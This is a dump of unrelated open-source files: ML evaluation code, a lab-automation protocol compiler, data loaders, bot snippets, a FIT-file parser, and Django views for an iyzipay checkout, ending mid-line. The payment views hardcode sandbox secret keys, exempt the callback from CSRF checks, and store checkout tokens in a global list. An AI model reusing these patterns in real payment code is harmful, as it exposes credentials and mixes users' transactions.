pandas as pd\r\nimport numpy as np\r\n\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.metrics import confusion_matrix, accuracy_score\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.tree import export_graphviz\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.ensemble import GradientBoostingClassifier\r\n\r\nimport graphviz\r\n\r\nfrom xml.etree import ElementTree as ET\r\nfrom IPython.display import display, SVG\r\n\r\nfrom .utils import display_svg_with_zoom\r\n\r\nfrom io import BytesIO\r\nfrom PIL import Image\r\n\r\nsns.set_theme()\r\n\r\nclass ModelEvaluator:\r\n def __init__(self, X, y, hyperparameters, test_size=0.2, random_state=42):\r\n \"\"\"\r\n X: features dataframe\r\n y: target series/dataframe\r\n hyperparameters: dictionary of hyperparameters for models\r\n test_size: proportion of the dataset to include in the test split\r\n \"\"\"\r\n self.X, self.encoders = self._label_encode_dataframe(X)\r\n self.y = y\r\n self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size=test_size, random_state=random_state)\r\n self.hyperparameters = hyperparameters\r\n self.models = {}\r\n self.predictions = {}\r\n self.confusion_matrices = {}\r\n self.feature_importances = {}\r\n \r\n def _label_encode_dataframe(self, df):\r\n \"\"\"\r\n Label encode categorical columns of a dataframe\r\n \"\"\"\r\n df_encoded = df.copy()\r\n encoders = {}\r\n for column in df.columns:\r\n if df[column].dtype == 'object':\r\n encoder = LabelEncoder()\r\n df_encoded[column] = encoder.fit_transform(df[column])\r\n encoders[column] = encoder\r\n return df_encoded, encoders\r\n \r\n def _initialize_model(self, model_name, params):\r\n \"\"\"\r\n Initialize the model based on the algorithm and hyperparameters\r\n \"\"\"\r\n\r\n # Default parameters for each classifier\r\n defaults = {\r\n \"DecisionTree\": {\r\n 'criterion': 'gini',\r\n 'splitter': 'best',\r\n 'max_depth': None,\r\n 'min_samples_split': 2,\r\n 'min_samples_leaf': 1,\r\n 'min_weight_fraction_leaf': 0.0,\r\n 'max_features': None,\r\n 'random_state': None,\r\n 'max_leaf_nodes': None,\r\n 'min_impurity_decrease': 0.0,\r\n 'class_weight': None,\r\n 'ccp_alpha': 0.0\r\n },\r\n \"RandomForest\": {\r\n 'n_estimators': 100,\r\n 'criterion': 'gini',\r\n 'max_depth': None,\r\n 'min_samples_split': 2,\r\n 'min_samples_leaf': 1,\r\n 'min_weight_fraction_leaf': 0.0,\r\n 'max_features': 'sqrt',\r\n 'max_leaf_nodes': None,\r\n 'min_impurity_decrease': 0.0,\r\n 'bootstrap': True,\r\n 'oob_score': False,\r\n 'n_jobs': None,\r\n 'random_state': None,\r\n 'verbose': 0,\r\n 'warm_start': False,\r\n 'class_weight': None,\r\n 'ccp_alpha': 0.0,\r\n 'max_samples': None\r\n },\r\n \"SVM\": {\r\n 'C': 1.0,\r\n 'kernel': 'rbf',\r\n 'degree': 3,\r\n 'gamma': 'scale',\r\n 'coef0': 0.0,\r\n 'shrinking': True,\r\n 'probability': False,\r\n 'tol': 0.001,\r\n 'cache_size': 200,\r\n 'class_weight': None,\r\n 'verbose': False,\r\n 'max_iter': -1,\r\n 'decision_function_shape': 'ovr',\r\n 'break_ties': False,\r\n 'random_state': None\r\n },\r\n \"GradientBoosting\": {\r\n 'loss': 'deviance',\r\n 'learning_rate': 0.1,\r\n 'n_estimators': 100,\r\n 'subsample': 1.0,\r\n 'criterion': 'friedman_mse',\r\n 'min_samples_split': 2,\r\n 'min_samples_leaf': 1,\r\n 'min_weight_fraction_leaf': 0.0,\r\n 'max_depth': 3,\r\n 'min_impurity_decrease': 
0.0,\r\n 'min_impurity_split': None,\r\n 'init': None,\r\n 'random_state': None,\r\n 'max_features': None,\r\n 'verbose': 0,\r\n 'max_leaf_nodes': None,\r\n 'warm_start': False,\r\n 'validation_fraction': 0.1,\r\n 'n_iter_no_change': None,\r\n 'tol': 0.0001,\r\n 'ccp_alpha': 0.0\r\n }\r\n }\r\n\r\n classifier_mapping = {\r\n \"DecisionTree\": DecisionTreeClassifier,\r\n \"RandomForest\": RandomForestClassifier,\r\n \"SVM\": SVC,\r\n \"GradientBoosting\": GradientBoostingClassifier\r\n }\r\n\r\n alg = params[\"algorithm\"]\r\n\r\n # Update defaults with provided parameters and filter out invalid parameters\r\n valid_params = {k: v for k, v in {**defaults[alg], **params}.items() if k in signature(classifier_mapping[alg]).parameters}\r\n\r\n if alg == \"DecisionTree\":\r\n return DecisionTreeClassifier(**valid_params)\r\n elif alg == \"RandomForest\":\r\n return RandomForestClassifier(**valid_params)\r\n elif alg == \"SVM\":\r\n return SVC(**valid_params)\r\n elif alg == \"GradientBoosting\":\r\n return GradientBoostingClassifier(**valid_params)\r\n else:\r\n raise ValueError(f\"Unsupported algorithm: {params['algorithm']}\") \r\n def run_models(self):\r\n \"\"\"\r\n Train models based on the provided hyperparameters and predict on the test set\r\n \"\"\"\r\n for model_name, params in self.hyperparameters.items():\r\n model = self._initialize_model(model_name, params)\r\n model.fit(self.X_train, self.y_train)\r\n self.models[model_name] = model\r\n preds = model.predict(self.X_test)\r\n self.predictions[model_name] = preds\r\n self.confusion_matrices[model_name] = confusion_matrix(self.y_test, preds)\r\n # Check if the model has feature_importances_ attribute\r\n if hasattr(model, \"feature_importances_\"):\r\n self.feature_importances[model_name] = model.feature_importances_\r\n print(f\"{model_name} is finished.\")\r\n \r\n def get_predictions(self, model_name):\r\n return self.predictions.get(model_name, None)\r\n \r\n def get_confusion_matrix(self, model_name):\r\n return self.confusion_matrices.get(model_name, None)\r\n \r\n def get_feature_importances(self, model_name):\r\n \"\"\"\r\n Return feature importances as a sorted dataframe\r\n \"\"\"\r\n importances = self.feature_importances.get(model_name, None)\r\n if importances is None:\r\n return None\r\n \r\n df_importances = pd.DataFrame({\r\n \"feature\": self.X.columns,\r\n \"importance\": importances\r\n })\r\n return df_importances.sort_values(by=\"importance\", ascending=False).reset_index(drop=True)\r\n \r\n def plot_confusion_matrix(self, model_name):\r\n \"\"\"\r\n Plot confusion matrix as a heatmap\r\n \"\"\"\r\n matrix = self.get_confusion_matrix(model_name)\r\n if matrix is None:\r\n print(f\"No confusion matrix found for model: {model_name}\")\r\n return\r\n \r\n # Check if target variable was label-encoded\r\n if self.y.name in self.encoders:\r\n labels = self.encoders[self.y.name].classes_\r\n else:\r\n labels = self.y.unique()\r\n \r\n plt.figure(figsize=(8, 6))\r\n sns.heatmap(matrix, annot=True, fmt='g', cmap='Blues', \r\n xticklabels=labels,\r\n yticklabels=labels)\r\n plt.xlabel('Predicted Label')\r\n plt.ylabel('True Label')\r\n plt.title(f'Confusion Matrix for {model_name}')\r\n plt.show()\r\n\r\n def visualize_decision_tree(self, model_name):\r\n \"\"\"\r\n Visualize the decision tree using graphviz\r\n \"\"\"\r\n model = self.models.get(model_name, None)\r\n if model is None:\r\n print(f\"No model found with name: {model_name}\")\r\n return\r\n \r\n if not isinstance(model, DecisionTreeClassifier):\r\n 
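# Note: sklearn's export_graphviz renders a single fitted tree, so only\r\n # DecisionTreeClassifier instances are supported by this helper.\r\n 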
print(f\"Model {model_name} is not a DecisionTree. Visualization only supports DecisionTree.\")\r\n return\r\n \r\n # Convert class names to string type\r\n str_class_names = [str(cls) for cls in model.classes_]\r\n \r\n dot_data = export_graphviz(model, out_file=None, \r\n feature_names=self.X.columns, \r\n class_names=str_class_names, \r\n filled=True, rounded=True, \r\n special_characters=True) \r\n graph = graphviz.Source(dot_data) \r\n return graph\r\n","repo_name":"hamid-shojaei/modelrunner","sub_path":"modelrunner/model_evaluator.py","file_name":"model_evaluator.py","file_ext":"py","file_size_in_byte":9294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28149011752","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\n\ndf = pd.read_csv('./data/train.csv')\ndf.dropna(axis=0)\n\ny = df['prix']\nx = df.drop('prix', axis=1)\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.1, random_state=69)\n\ny_test.to_csv('./data/test2.csv', index=False, header=None)\ny_test.to_csv('./test2-predictions.csv', index=False, header=None)\n","repo_name":"nicoOkie/kaggle","sub_path":"split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"7923138473","text":"\"\"\"\nThis script takes a 15 nucleotide target sequence followed by a base pair\nrepresenting the receiver plasmid.\n\nIt outputs an OT-One protocol to assemble a TALEN protein with the pFusX\nsystem, which provides a pre-plated library of plasmids and a database\nof well positions for this script to query.\n\nInput is a string representing an RVD sequence, whitespace optional,\nsuch as:\n\n> NI NG NI HD HD NN NG HD NG NG NI NG NG NG NG\n\nOr DNA, such as:\n\n> ATACCGTCTTATTTT\n\nOutput is a JSON file which represents a protocol that can run on any\nOT-One machine.\n\"\"\"\n\nimport sys\nimport os\nimport re\nimport json\nimport datetime\n\nfrom labsuite.protocol import Protocol\nfrom labsuite.protocol.formatters import JSONFormatter\n\nfrom .plate_map import PlateMap\n\n_fusx_plates = PlateMap(\n os.path.dirname(__file__) + '/data/fusx_platemap.csv',\n rotated=True,\n TALE1='A33',\n TALE2='K33',\n TALE3='U33',\n TALE4='A48',\n TALE5='K48'\n)\n\n\ndef dna_to_rvd(string):\n \"\"\"\n Translates a DNA string to RVD.\n \"\"\"\n translation = {\n 'A': 'NI',\n 'C': 'HD',\n 'T': 'NG',\n 'G': 'NN',\n 'R': 'NN' # Just assume G if purine is unspecified.\n }\n string = string.upper()\n rvd = []\n for c in string:\n if c == 'Y':\n # Apparently for restriction enzymes pyrimidines need to be more\n # specific than purines.\n raise ValueError(\n \"Invalid base: 'Y'; pyrimidines must be specified.\"\n )\n elif c not in translation:\n raise ValueError(\"Invalid character: {}\".format(c))\n else:\n rvd.append(translation[c])\n return ' '.join(rvd)\n\n\ndef rvd_to_tal(string):\n \"\"\"\n Translates an RVD string into TAL.\n\n Very similar to a reverse of dna_to_rvd, but DNA->RVD2->TAL2 will return\n a normalized result rather than the original input.\n \"\"\"\n translation = {\n 'NI': 'A',\n 'HD': 'C',\n 'NG': 'T',\n 'NN': 'G'\n }\n out = []\n string = string.upper() # Convert input to uppercase;\n string = re.sub(r'[^A-Z]+', '', string) # remove any separators.\n codes = map(''.join, zip(*[iter(string)] * 2)) # Two-character segments.\n for code in codes:\n if code not in translation:\n raise ValueError(\"Invalid RVD sequence: 
{}\".format(code))\n else:\n out.append(translation[code])\n return ''.join(out)\n\n\ndef tal_to_codons(tal):\n \"\"\"\n Takes a 15 or 16-base ATGC sequence and outputs an array of five\n codon sequences after doing validation.\n \"\"\"\n if re.search(r'[^ACTG]', tal): # Content check over the whole string.\n raise ValueError(\"FusX TALEN sequence must be in ACTG form.\")\n codons = []\n for n in range(0, 12, 3): # Chunk into four parts of 3.\n codons.append(tal[n:n + 3])\n codons.append(tal[12:]) # Grab the last 2, 3 or 4 bases.\n return codons\n\n\ndef get_plasmid_wells(sequence, receiver='pC'):\n \"\"\"\n Takes a string of either RVD or DNA basepairs (15 or 16), does a\n bunch of input normalization and outputs a hash containing well\n positions for pfusx_[1..5], receiver, and backbone.\n\n No plate data is necessary at the moment; those are hard-coded in the\n template.\n \"\"\"\n\n tal = rvd_to_tal(sequence) # Normalize the sequence.\n\n codons = tal_to_codons(tal[0:-1])\n pLR_bp = tal[-1] # Last base is the receiver.\n\n if len(codons[4]) > 4:\n raise ValueError(\"Sequence must be an array of five codons.\")\n\n # We only actually need well coordinates for these because the plate\n # names are hard-coded into the pFusX JSON template.\n well_locs = {}\n\n # We pull the FusX plasmid locations from the plate map, five in total.\n for i, codon in enumerate(codons):\n codon_index = i + 1\n plate_name = 'TALE{}'.format(codon_index)\n location = _fusx_plates.get_plate(plate_name).find_well(codon)\n if not location:\n raise ValueError(\n \"Can't find well position for '{}' on plate {}.\".\n format(codon, plate_name)\n )\n else:\n well_locs[plate_name] = location\n\n plate = _fusx_plates.get_plate('TALE5')\n well_locs['pLR'] = plate.find_well('pLR: {}'.format(pLR_bp))\n if not well_locs['pLR']:\n raise ValueError(\"Invalid pLR: {}\".format(pLR_bp))\n\n valid_receivers = ['pT3TS', 'pC', 'pKT3']\n if receiver not in valid_receivers:\n raise ValueError(\n \"Receiver must be one of: {}\"\n .format(\", \".join(valid_receivers))\n )\n\n rec_well = plate.find_well(receiver)\n if not rec_well:\n # No way to really test this bit without adding an invalid\n # receiver that doesn't exist in the plate mapping...\n raise ValueError(\n \"Can't find receiver well for '{}'.\".\n format(receiver)\n )\n well_locs['receiver'] = rec_well\n\n return well_locs\n\n\ndef _get_tal_transfers(sequence, well='A1', receiver='pC'):\n \"\"\"\n Creates an array of transfer arguments for a TAL sequence.\n \"\"\"\n\n output_well = \"FusX Output:{}\".format(well)\n plasmids = get_plasmid_wells(sequence, receiver)\n\n # TAL Plasmid transfers\n tals = []\n for n in range(1, 6): # TALEN plasmids, 1 through 5\n tals.append(\n (\n \"TALE{}:{}\".format(n, plasmids['TALE{}'.format(n)]),\n output_well,\n 3\n )\n )\n\n # pLR and Receiver transfers\n pLR = [('TALE5:{}'.format(plasmids['pLR']), output_well, 3)]\n receiver = [('TALE5:{}'.format(plasmids['receiver']), output_well, 3)]\n\n return tals + pLR + receiver\n\n\ndef _normalize_sequence(sequence):\n \"\"\"\n Validate and normalize input sequences to RVD.\n \"\"\"\n\n # Uppercase; no separators, A-Z only.\n sequence = sequence.upper()\n sequence = re.sub(r'[^A-Z]+', '', sequence)\n\n # Normalize to RVD input.\n if re.match(r'^[ATGCYR]*$', sequence): # Match: DNA bases.\n sequence = re.sub(r'\s', '', dna_to_rvd(sequence))\n elif re.match(r'^[NIHDG]*$', sequence): # Match: RVD bases.\n pass # Already in RVD form.\n else:\n raise ValueError(\"Input must be a sequence of RVD or DNA bases.\")\n\n if len(sequence) not 
in [32, 30]:\n raise ValueError(\"Sequence must be 15 or 16 RVD or DNA bases.\")\n\n return sequence\n\n\ndef compile(*sequences, output=None):\n \"\"\"\n Takes a list of sequence arguments (RVD or DNA) and outputs a generated\n protocol to make plasmids targeting those sequences.\n \"\"\"\n sequences = list(sequences)\n\n # Limit right now is the number of tips in the static deck map we're\n # using for this protocol.\n if len(sequences) > 15:\n raise ValueError(\n \"FusX compiler only supports up to 15 sequences.\"\n )\n\n # Argument normalization.\n normalized = []\n for i, s in enumerate(sequences):\n try:\n normalized.append(_normalize_sequence(s))\n except ValueError as e:\n raise ValueError(\"Sequence #{}: {}\".format(i + 1, e))\n\n # Make the transfers for every sequence.\n buffers = []\n tals = []\n enzymes = []\n\n well_map = {}\n for n, s in enumerate(normalized):\n n = n + 1\n if n > 12:\n well = 'B{}'.format(n - 12)\n else:\n well = 'A{}'.format(n)\n # We're going to do all the buffers at the start...\n buffers += [('Ingredients:A1', 'FusX Output:' + well, 10)]\n # TALs in the middle...\n tals += _get_tal_transfers(s, well=well)\n # Enzyme (BsmBI) at the end.\n enzymes += [(\"Ingredients:B1\", 'FusX Output:' + well, 10)]\n # For printing an output map.\n well_map[well] = sequences[n - 1] # Map to original input.\n\n # Nicely formatted well map for the description.\n output_map = []\n for well in sorted(well_map):\n output_map.append(\"{}: {}\".format(well, well_map[well]))\n\n protocol = Protocol()\n protocol.set_info(\n name=\"FusX Transfer\",\n created=str(datetime.date.today()),\n description=\"; \".join(output_map)\n )\n protocol.add_instrument('A', 'p10')\n protocol.add_instrument('B', 'p200')\n protocol.add_container('A1', 'tuberack.15-50ml', label='Ingredients')\n protocol.add_container('E1', 'microplate.96', label='FusX Output')\n protocol.add_container('A2', 'point.trash')\n protocol.add_container('E3', 'microplate.96') # Cool deck.\n protocol.add_container('B2', 'tiprack.p10')\n protocol.add_container('B1', 'tiprack.p10')\n protocol.add_container('B3', 'tiprack.p10')\n protocol.add_container('C1', 'microplate.96', label='TALE1')\n protocol.add_container('D1', 'microplate.96', label='TALE2')\n protocol.add_container('C2', 'microplate.96', label='TALE3')\n protocol.add_container('D2', 'microplate.96', label='TALE4')\n protocol.add_container('C3', 'microplate.96', label='TALE5')\n\n # Take our three transfer groups and make them into a consolidated\n # transfer list.\n\n # Buffers\n group = []\n for start, end, volume in buffers:\n group.append((start, end, {'ul': volume}))\n protocol.transfer_group(*group, tool=\"p10\")\n\n # TALS\n for start, end, volume in tals:\n protocol.transfer(start, end, ul=volume)\n\n # Enzymes\n for start, end, volume in enzymes:\n protocol.transfer(start, end, ul=volume)\n\n compiled = protocol.export(JSONFormatter)\n\n if output:\n with open(output, 'w') as f:\n f.write(compiled)\n\n return compiled\n","repo_name":"Yuffster/labsuite","sub_path":"labsuite/compilers/pfusx.py","file_name":"pfusx.py","file_ext":"py","file_size_in_byte":9473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70096616536","text":"from typing import List\n\nfrom schedule.data_transfer_objects.availability_dto import AvailabilityDTO\nfrom schedule.data_transfer_objects.service_dto import ServiceDTO\nfrom schedule.data_transfer_objects.vehicle_dto import VehicleDTO\n\n\ndef row_to_array(line: str) -> 
List[int]:\n array_line = line.replace(' \\n', '').replace('\\n', '').split(' ')\n\n return [int(x) for x in array_line]\n\n\ndef load_distances(file_name: str) -> List[List[int]]:\n distances_file = open(file_name, 'r')\n return [row_to_array(row) for row in distances_file]\n\n\ndef load_data(raw_data: List[str]) -> tuple[List['VehicleDTO'], List['ServiceDTO'], int]:\n vehicles_count = int(raw_data.pop(0))\n\n vehicles: List[VehicleDTO] = [VehicleDTO(0)]\n services: List[ServiceDTO] = [ServiceDTO(identifier=0, vehicle_identifier=0)]\n\n availability_counter = 1\n service_counter = 1\n\n for i in range(0, vehicles_count):\n row: list[int] = row_to_array(raw_data.pop(0))\n\n vehicle = VehicleDTO(identifier=row.pop(0))\n\n services_count = row.pop(0)\n for j in range(0, services_count):\n service = ServiceDTO(\n identifier=service_counter,\n vehicle_identifier=i + 1,\n start=row.pop(0),\n end=row.pop(0),\n duration=row.pop(0),\n address=row.pop(0),\n )\n\n vehicle.add_service(service)\n services.append(service)\n service_counter += 1\n\n availabilities_count = row.pop(0)\n for j in range(0, availabilities_count):\n vehicle.add_availability(AvailabilityDTO(\n identifier=availability_counter,\n vehicle_identifier=i,\n start=row.pop(0),\n end=row.pop(0),\n address=row.pop(0),\n ))\n availability_counter += 1\n\n vehicles.append(vehicle)\n\n for i in range(1, len(services)):\n services.append(ServiceDTO(\n identifier=len(services),\n vehicle_identifier=services[i].vehicle_identifier\n ))\n\n return vehicles, services, service_counter - 1\n","repo_name":"GrzegorzSikorski96/pwr-car-rental","sub_path":"schedule/generators/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"7201155923","text":"import Base, Background\r\nimport UiInit\r\nimport os, importlib\r\nfrom qfluentwidgets import qrouter\r\n\r\n#Wrapper for main procedure\r\n#To be plug into Background.run\r\ndef wrapper():\r\n #Store returnValue into list, to emulate pass by pointer in Python\r\n returnValue = [0]\r\n def main():\r\n from UI import GUI\r\n class BGUI(GUI):\r\n #Custom exit function\r\n def exit(self, code=None):\r\n if code is None:\r\n code = self.app.exec_()\r\n returnValue[0] = code\r\n\r\n #Module initialization\r\n def refine(self):\r\n for suspect in UiInit.members:\r\n print(\"Loading %s\"%suspect)\r\n moduleName = suspect.rsplit(\".\", 1)[0]\r\n importlib.import_module(\"UiInit.%s\"%moduleName)\r\n getattr(UiInit, moduleName).Init(self)\r\n\r\n #GUI Initialization procedure & Main loop\r\n def launch(self):\r\n qrouter.setDefaultRouteKey(self.ui.stackedWidget, self.ui.Homepage.objectName())\r\n self.ui.stackedWidget.currentChanged.connect(self.interfaceChanged)\r\n self.ui.stackedWidget.setCurrentIndex(0)\r\n self.ui.NavigationBar.setCurrentItem(self.ui.Homepage.objectName())\r\n super().launch()\r\n\r\n MainWindow = BGUI()\r\n #Hijack exit function\r\n Background.exitFunc = MainWindow.forceQuit\r\n MainWindow.launch()\r\n\r\n #Return value hook\r\n def hook():\r\n return returnValue[0]\r\n\r\n return main, hook\r\n\r\n#Start program with wrapper(SQL initialization)\r\nBackground.run(*(wrapper()))\r\n","repo_name":"yl12053/_yl12053_SBAASSM","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4659103232","text":"from pathlib import Path\n\nimport 
fitdecode\n\nfrom gopro_overlay.entry import Entry\nfrom gopro_overlay.gpmf import GPSFix\nfrom gopro_overlay.point import Point\nfrom gopro_overlay.timeseries import Timeseries\n\n\ndef garmin_to_gps(v):\n return v / ((2 ** 32) / 360)\n\n\ninterpret = {\n \"position_lat\": lambda f, u: {\"lat\": garmin_to_gps(f.value)},\n \"position_long\": lambda f, u: {\"lon\": garmin_to_gps(f.value)},\n \"distance\": lambda f, u: {\"odo\": u.Quantity(f.value, u.m)},\n \"altitude\": lambda f, u: {\"alt\": u.Quantity(f.value, u.m)},\n \"enhanced_altitude\": lambda f, u: {\"alt\": u.Quantity(f.value, u.m)},\n \"speed\": lambda f, u: {\"speed\": u.Quantity(f.value, u.mps)},\n \"enhanced_speed\": lambda f, u: {\"speed\": u.Quantity(f.value, u.mps)},\n \"heart_rate\": lambda f, u: {\"hr\": u.Quantity(f.value, u.bpm)},\n \"cadence\": lambda f, u: {\"cad\": u.Quantity(f.value, u.rpm)},\n \"temperature\": lambda f, u: {\"atemp\": u.Quantity(f.value, u.degC)},\n \"gps_accuracy\": lambda f, u: {\"dop\": u.Quantity(f.value)},\n \"power\": lambda f, u: {\"power\": u.Quantity(f.value, u.watt)},\n \"grade\": lambda f, u: {\"grad\": u.Quantity(f.value)},\n}\n\n\ndef load_timeseries(filepath: Path, units):\n ts = Timeseries()\n\n with fitdecode.FitReader(filepath) as ff:\n for frame in (f for f in ff if f.frame_type == fitdecode.FIT_FRAME_DATA and f.name == 'record'):\n entry = None\n items = {}\n\n for field in frame.fields:\n if field.name == \"timestamp\":\n # we should set the gps fix or Journey.accept() will skip the point:\n entry = Entry(\n dt=field.value,\n gpsfix=GPSFix.LOCK_3D.value\n )\n else:\n if field.name in interpret and field.value is not None:\n items.update(**interpret[field.name](field, units))\n\n if \"lat\" in items and \"lon\" in items:\n items[\"point\"] = Point(lat=items[\"lat\"], lon=items[\"lon\"])\n del (items[\"lat\"])\n del (items[\"lon\"])\n\n # only use fit data items that have lat/lon\n if \"point\" in items:\n entry.update(**items)\n ts.add(entry)\n\n return ts\n","repo_name":"time4tea/gopro-dashboard-overlay","sub_path":"gopro_overlay/fit.py","file_name":"fit.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":219,"dataset":"github-code","pt":"68"} +{"seq_id":"37385624404","text":"from enum import Enum\nfrom ctx import x\nfrom replies import Reply\nfrom telegram import KeyboardButton as Btn, ReplyKeyboardMarkup as Kbd\n\n\nclass RideVariant(Enum):\n HOURLY = 'Почасовой'\n DAILY = 'На весь день'\n BY_AMOUNT = 'На всю сумму'\n\n\ndef ride_hourly():\n u = yield 'На сколько часов?'\n while True:\n if u.message.text.isdigit() and 1 < int(u.message.text) < 11:\n break\n else:\n u = yield 'Неправильный ответ, ещё разок'\n hours = int(u.message.text)\n\n\ndef ride():\n u = yield Reply(\n 'Какой вариант вам подходит?',\n reply_markup=Kbd(\n [\n [Btn(RideVariant.HOURLY.value), Btn(RideVariant.DAILY.value)],\n [Btn(RideVariant.BY_AMOUNT.value)]\n ],\n one_time_keyboard=True,\n resize_keyboard=True\n )\n )\n\n\n\n","repo_name":"metheoryt/skatepark-telegram-bot","sub_path":"dialog/ride.py","file_name":"ride.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18691811156","text":"from configparser import ConfigParser, NoOptionError, NoSectionError\nimport sys\n\ncfg = ConfigParser()\ncfg.read(\"config.ini\")\n\ntry:\n APP_ID = cfg.getint(\"pyrogram\", \"api_id\")\n APP_HASH = cfg.get(\"pyrogram\", \"api_hash\")\nexcept (NoOptionError, 
NoSectionError):\n # sys.exit(print('fill in configs before making the session.'))\n print(\"Find your App configs in https://my.telegram.org\")\n APP_ID = int(input(\"Enter your api_id: \"))\n APP_HASH = input(\"Enter your api_hash: \")\n","repo_name":"pokurt/qr-Pyrogram-session","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"68"} +{"seq_id":"12803834116","text":"from django.shortcuts import render, redirect\nimport iyzipay\nimport json\n# Create your views here.\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.views.decorators.http import require_http_methods\nfrom django.views.decorators.csrf import csrf_exempt\nimport requests\nfrom django.contrib import messages\nimport pprint\nfrom .models import *\nfrom .forms import *\nfrom django.contrib import messages\nfrom django.db.models import Q\n# import jsonresponse\nfrom django.http import JsonResponse\n# Create your views here.\n\napi_key = 'sandbox-P0pc0m5C6J5ZP28gkQpBVtRXrFRHm8mr'\nsecret_key = 'sandbox-5UKiwkqmhFYRq2gzn9iTPvKRFUfctyud'\nbase_url = 'sandbox-api.iyzipay.com'\n\noptions = {\n 'api_key': api_key,\n 'secret_key': secret_key,\n 'base_url': base_url\n}\n\n\nsozlukToken = list()\n\ndef payment(request):\n context = dict()\n sepetim = Odeme.objects.get(user = request.user)\n buyer={\n 'id': 'BY789',\n 'name': 'John',\n 'surname': 'Doe',\n 'gsmNumber': '+905350000000',\n 'email': 'email@email.com',\n 'identityNumber': '74300864791',\n 'lastLoginDate': '2015-10-05 12:43:35',\n 'registrationDate': '2013-04-21 15:12:09',\n 'registrationAddress': 'Nidakule Göztepe, Merdivenköy Mah. Bora Sok. No:1',\n 'ip': '85.34.78.112',\n 'city': 'Istanbul',\n 'country': 'Turkey',\n 'zipCode': '34732'\n }\n\n address={\n 'contactName': 'Jane Doe',\n 'city': 'Istanbul',\n 'country': 'Turkey',\n 'address': 'Nidakule Göztepe, Merdivenköy Mah. Bora Sok. 
No:1',\n 'zipCode': '34732'\n }\n\n basket_items=[\n {\n 'id': 'BI101',\n 'name': 'Binocular',\n 'category1': 'Collectibles',\n 'category2': 'Accessories',\n 'itemType': 'PHYSICAL',\n 'price': '0.3'\n },\n {\n 'id': 'BI102',\n 'name': 'Game code',\n 'category1': 'Game',\n 'category2': 'Online Game Items',\n 'itemType': 'VIRTUAL',\n 'price': '0.5'\n },\n {\n 'id': 'BI103',\n 'name': 'Usb',\n 'category1': 'Electronics',\n 'category2': 'Usb / Cable',\n 'itemType': 'PHYSICAL',\n 'price': '0.2'\n }\n ]\n\n request={\n 'locale': 'tr',\n 'conversationId': '123456789',\n 'price': '1',\n 'paidPrice': sepetim.toplamFiyat,\n 'currency': 'TRY',\n 'basketId': 'B67832',\n 'paymentGroup': 'PRODUCT',\n \"callbackUrl\": \"http://localhost:8000/result/\",\n \"enabledInstallments\": ['2', '3', '6', '9'],\n 'buyer': buyer,\n 'shippingAddress': address,\n 'billingAddress': address,\n 'basketItems': basket_items,\n # 'debitCardAllowed': True\n }\n\n checkout_form_initialize = iyzipay.CheckoutFormInitialize().create(request, options)\n\n #print(checkout_form_initialize.read().decode('utf-8'))\n page = checkout_form_initialize\n header = {'Content-Type': 'application/json'}\n content = checkout_form_initialize.read().decode('utf-8')\n json_content = json.loads(content)\n print(type(json_content))\n print(json_content[\"checkoutFormContent\"])\n print(\"************************\")\n print(json_content[\"token\"])\n print(\"************************\")\n sozlukToken.append(json_content[\"token\"])\n return HttpResponse(json_content[\"checkoutFormContent\"])\n\n@require_http_methods(['POST'])\n@csrf_exempt\ndef result(request):\n context = dict()\n\n url = request.META.get('index')\n\n request = {\n 'locale': 'tr',\n 'conversationId': '123456789',\n 'token': sozlukToken[0]\n }\n checkout_form_result = iyzipay.CheckoutForm().retrieve(request, options)\n print(\"************************\")\n print(type(checkout_form_result))\n result = checkout_form_result.read().decode('utf-8')\n print(\"************************\")\n print(sozlukToken[0]) \n print(\"************************\")\n print(\"************************\")\n sonuc = json.loads(result, object_pairs_hook=list)\n #print(sonuc[0][1]) # İşlem sonuç Durumu dönüyor\n #print(sonuc[5][1]) # Test ödeme tutarı\n print(\"************************\")\n for i in sonuc:\n print(i)\n print(\"************************\")\n print(sozlukToken)\n print(\"************************\")\n if sonuc[0][1] == 'success':\n context['success'] = 'Başarılı İŞLEMLER'\n return HttpResponseRedirect(reverse('success'), context)\n\n elif sonuc[0][1] == 'failure':\n context['failure'] = 'Başarısız'\n return HttpResponseRedirect(reverse('failure'), context)\n\n return HttpResponse(result)\ndef index(request):\n urunler = Urun.objects.all()\n kategoriler = Kategori.objects.all()\n sepet = Sepet.objects.filter(user = request.user)\n # uzunluk = len(sepet)\n # Arama\n search = ''\n if request.GET.get('search'):\n search = request.GET.get('search')\n urunler = Urun.objects.filter(\n Q(isim__icontains = search) |\n Q(kategori__isim__icontains = search)\n )\n if request.method == 'POST':\n urun = request.POST['urunId']\n adet = request.POST['adet']\n urunum = Urun.objects.get(id = urun)\n if Sepet.objects.filter(user = request.user, urun = urun).exists():\n sepet = Sepet.objects.get(user = request.user, urun = urunum)\n sepet.adet += int(adet)\n sepet.fiyat += int(adet) * urunum.fiyat\n sepet.save()\n \n else:\n sepet = Sepet(user = request.user, urun = urunum, adet 